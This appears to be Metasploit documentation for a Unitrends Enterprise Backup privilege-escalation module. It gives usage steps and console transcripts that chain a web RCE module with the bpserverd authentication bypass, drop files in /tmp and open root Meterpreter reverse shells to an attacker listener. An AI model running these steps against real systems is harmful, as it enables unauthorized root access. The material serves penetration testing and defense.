## Vulnerable Application It was discovered that the Unitrends `bpserverd` proprietary protocol, as exposed via `xinetd`, has an issue in which its authentication can be bypassed. A remote attacker could use this issue to execute arbitrary commands with root privilege on the target system. This is very similar to `exploits/linux/misc/ueb9_bpserverd` however it runs against the `localhost` by dropping a python script on the local file system. Unitrends stopped `bpserverd` from listening remotely on version 10. ## Vulnerable Application This module has been tested successfully on: * UEB 9.2 * UEB 10.0 ## Verification Steps 1. Get a user shell with `exploit/linux/http/ueb_api_rce` with `set target 1` 2. ```use exploit/linux/local/ueb_bpserverd_privesc ``` 3. ```set session [SESSION]``` 4. ```exploit``` 5. A root meterpreter session should have been opened successfully ## Scenarios ### UEB 10.0 on CentOS 6.5 ``` msf > use exploit/linux/local/ueb_priv_esc msf exploit(linux/local/ueb_priv_esc) > set session 4 session => 4 msf exploit(linux/local/ueb_priv_esc) > exploit [*] Started reverse TCP handler on 15.0.0.177:4444 [*] Writing payload executable to '/tmp/pEFoythF' [*] Writing privesc script to '/tmp/CTZSovJR' [*] Fixing permissions [*] Sending stage (857352 bytes) to 10.20.1.202 [*] Meterpreter session 5 opened (15.0.0.177:4444 -> 10.20.1.202:45188) at 2018-04-27 16:44:28 -0400 [+] Deleted /tmp/pEFoythF [+] Deleted /tmp/CTZSovJR meterpreter > getuid Server username: uid=0, gid=0, euid=0, egid=0 ``` ### UEB 9.2 on CentOS 6 ``` resource (ueb_priv.rb)> use exploit/linux/http/ueb_api_rce resource (ueb_priv.rb)> set rhost 1.1.1.1 rhost => 1.1.1.1 resource (ueb_priv.rb)> set lhost 2.2.2.2 lhost => 2.2.2.2 resource (ueb_priv.rb)> set target 1 target => 1 resource (ueb_priv.rb)> run [*] Started reverse TCP handler on 2.2.2.2:4444 [*] 1.1.1.1:443 - Sending requests to UEB... [*] Command Stager progress - 19.76% done (164/830 bytes) [*] Command Stager progress - 39.16% done (325/830 bytes) [*] Command Stager progress - 56.87% done (472/830 bytes) [*] Command Stager progress - 74.82% done (621/830 bytes) [*] Command Stager progress - 92.77% done (770/830 bytes) [*] Command Stager progress - 110.48% done (917/830 bytes) [*] Sending stage (861480 bytes) to 1.1.1.1 [*] Meterpreter session 1 opened (2.2.2.2:4444 -> 1.1.1.1:40216) at 2018-11-15 20:03:46 -0500 [*] Command Stager progress - 126.63% done (1051/830 bytes) meterpreter > getuid Server username: uid=48, gid=48, euid=48, egid=48 meterpreter > sysinfo Computer : 1.1.1.1 OS : Red Hat 6.5 (Linux 2.6.32-573.26.1.el6.x86_64) Architecture : x64 BuildTuple : i486-linux-musl Meterpreter : x86/linux meterpreter > background [*] Backgrounding session 1... resource (ueb_priv.rb)> use exploit/linux/local/ueb_bpserverd_privesc resource (ueb_priv.rb)> set session 1 session => 1 resource (ueb_priv.rb)> run [*] Started reverse TCP handler on 2.2.2.2:4444 [*] Writing payload executable to '/tmp/.mM0iyQvoAO' [*] Writing privesc script to '/tmp/.sDjn0m' [*] Fixing permissions [*] Sending stage (861480 bytes) to 1.1.1.1 [*] Meterpreter session 2 opened (2.2.2.2:4444 -> 1.1.1.1:40219) at 2018-11-15 20:04:21 -0500 meterpreter > getuid Server username: uid=0, gid=0, euid=0, egid=0 ```